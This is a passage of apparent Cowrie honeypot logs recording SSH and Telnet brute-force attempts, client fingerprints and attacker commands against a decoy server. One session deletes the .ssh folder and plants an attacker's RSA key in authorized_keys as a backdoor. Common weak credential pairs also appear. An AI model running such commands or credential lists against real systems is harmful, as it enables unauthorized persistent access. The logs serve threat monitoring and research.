s256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T04:16:57.804524Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.login.success","username":"root","password":"Hw123456","message":"login attempt [root/Hw123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:16:58.633184Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:16:59.107439Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T04:16:59.108151Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T04:16:59.109033Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:16:59.318087Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:16:59.752226Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T04:16:59.752906Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T04:16:59.962154Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:16:59.963024Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59718,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d9dcef0bd52","protocol":"ssh","message":"New connection: 212.227.235.229:59718 (1.2.3.4:22) [session: 1d9dcef0bd52]","sensor":"my-vps","timestamp":"2025-08-28T04:17:00.169066Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T04:17:00.169948Z","src_ip":"212.227.235.229","session":"1d9dcef0bd52"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T04:17:00.377437Z","src_ip":"212.227.235.229","session":"1d9dcef0bd52"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T04:17:01.249877Z","src_ip":"212.227.235.229","session":"1d9dcef0bd52"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:02.463129Z","src_ip":"212.227.235.229","session":"1d9dcef0bd52"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59724,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea2b04c604b7","protocol":"ssh","message":"New connection: 212.227.235.229:59724 (1.2.3.4:22) [session: ea2b04c604b7]","sensor":"my-vps","timestamp":"2025-08-28T04:17:02.673335Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T04:17:02.674869Z","src_ip":"212.227.235.229","session":"ea2b04c604b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T04:17:02.883904Z","src_ip":"212.227.235.229","session":"ea2b04c604b7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:17:03.759621Z","src_ip":"212.227.235.229","session":"ea2b04c604b7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:03.969812Z","src_ip":"212.227.235.229","session":"ea2b04c604b7"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:03.970894Z","src_ip":"212.227.235.229","session":"b1f250810a09"}
{"eventid":"cowrie.session.connect","src_ip":"121.183.108.183","src_port":48656,"dst_ip":"1.2.3.4","dst_port":23,"session":"61ddce8f3af8","protocol":"telnet","message":"New connection: 121.183.108.183:48656 (1.2.3.4:23) [session: 61ddce8f3af8]","sensor":"my-vps","timestamp":"2025-08-28T04:17:11.712192Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38418,"dst_ip":"1.2.3.4","dst_port":22,"session":"36f4fc69d705","protocol":"ssh","message":"New connection: 212.227.235.229:38418 (1.2.3.4:22) [session: 36f4fc69d705]","sensor":"my-vps","timestamp":"2025-08-28T04:17:17.824750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:17:18.036221Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T04:17:18.260213Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.login.success","username":"root","password":"088863222*!$#","message":"login attempt [root/088863222*!$#] succeeded","sensor":"my-vps","timestamp":"2025-08-28T04:17:19.976365Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T04:17:21.016225Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T04:17:21.016920Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.5","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:21.484170Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.session.closed","duration":"68.2","message":"Connection lost after 68.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:21.521011Z","src_ip":"212.227.125.160","session":"44d5f487541f"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:21.731106Z","src_ip":"212.227.235.229","session":"36f4fc69d705"}
{"eventid":"cowrie.session.connect","src_ip":"205.210.31.172","src_port":62566,"dst_ip":"1.2.3.4","dst_port":22,"session":"f914bf6c498f","protocol":"ssh","message":"New connection: 205.210.31.172:62566 (1.2.3.4:22) [session: f914bf6c498f]","sensor":"my-vps","timestamp":"2025-08-28T04:17:34.176185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-28T04:17:34.548628Z","src_ip":"205.210.31.172","session":"f914bf6c498f"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-28T04:17:35.446426Z","src_ip":"205.210.31.172","session":"f914bf6c498f"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:42.225792Z","src_ip":"205.210.31.172","session":"f914bf6c498f"}
{"eventid":"cowrie.session.closed","duration":30.55272889137268,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:17:42.264848Z","src_ip":"121.183.108.183","session":"61ddce8f3af8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41371,"dst_ip":"1.2.3.4","dst_port":23,"session":"bbb58eb86b9d","protocol":"telnet","message":"New connection: 212.227.235.229:41371 (1.2.3.4:23) [session: bbb58eb86b9d]","sensor":"my-vps","timestamp":"2025-08-28T04:18:06.019080Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":28740,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d2655d81485","protocol":"ssh","message":"New connection: 212.227.125.160:28740 (1.2.3.4:22) [session: 7d2655d81485]","sensor":"my-vps","timestamp":"2025-08-28T04:18:25.442125Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:18:25.443333Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:18:25.524124Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.login.failed","username":"admin","password":"111111","message":"login attempt [admin/111111] failed","sensor":"my-vps","timestamp":"2025-08-28T04:18:25.932146Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin2","message":"login attempt [admin/admin2] failed","sensor":"my-vps","timestamp":"2025-08-28T04:18:27.015327Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1q2w3e4r5t","message":"login attempt [admin/1q2w3e4r5t] failed","sensor":"my-vps","timestamp":"2025-08-28T04:18:28.097779Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.login.failed","username":"admin","password":"QgZDQCK0WUiUYiu","message":"login attempt [admin/QgZDQCK0WUiUYiu] failed","sensor":"my-vps","timestamp":"2025-08-28T04:18:29.192443Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.login.failed","username":"admin","password":"guest","message":"login attempt [admin/guest] failed","sensor":"my-vps","timestamp":"2025-08-28T04:18:30.275266Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:18:31.358169Z","src_ip":"212.227.125.160","session":"7d2655d81485"}
{"eventid":"cowrie.session.closed","duration":31.348814725875854,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:18:37.367794Z","src_ip":"212.227.235.229","session":"bbb58eb86b9d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37904,"dst_ip":"1.2.3.4","dst_port":23,"session":"eb15991f4d06","protocol":"telnet","message":"New connection: 212.227.235.229:37904 (1.2.3.4:23) [session: eb15991f4d06]","sensor":"my-vps","timestamp":"2025-08-28T04:18:42.391388Z"}
{"eventid":"cowrie.session.closed","duration":31.259467363357544,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:19:13.650785Z","src_ip":"212.227.235.229","session":"eb15991f4d06"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54840,"dst_ip":"1.2.3.4","dst_port":22,"session":"2e0c1cf600fe","protocol":"ssh","message":"New connection: 212.227.235.229:54840 (1.2.3.4:22) [session: 2e0c1cf600fe]","sensor":"my-vps","timestamp":"2025-08-28T04:19:39.910980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T04:19:39.912168Z","src_ip":"212.227.235.229","session":"2e0c1cf600fe"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T04:19:40.020127Z","src_ip":"212.227.235.229","session":"2e0c1cf600fe"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo123","message":"login attempt [demo/demo123] failed","sensor":"my-vps","timestamp":"2025-08-28T04:19:40.346553Z","src_ip":"212.227.235.229","session":"2e0c1cf600fe"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T04:19:41.456681Z","src_ip":"212.227.235.229","session":"2e0c1cf600fe"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":26349,"dst_ip":"1.2.3.4","dst_port":22,"session":"78fb2a5f9485","protocol":"ssh","message":"New connection: 80.94.95.15:26349 (1.2.3.4:22) [session: 78fb2a5f9485]","sensor":"my-vps","timestamp":"2025-08-28T04:19:55.872182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T04:19:55.873069Z","src_ip":"80.94.95.15","session":"78fb2a5f9485"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T04:19:55.923847Z","src_ip":"80.94.95.15","session":"78fb2a5f9485"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T04:19:56.216500Z","src_ip":"80.94.95.15","session":"78fb2a5f9485"}
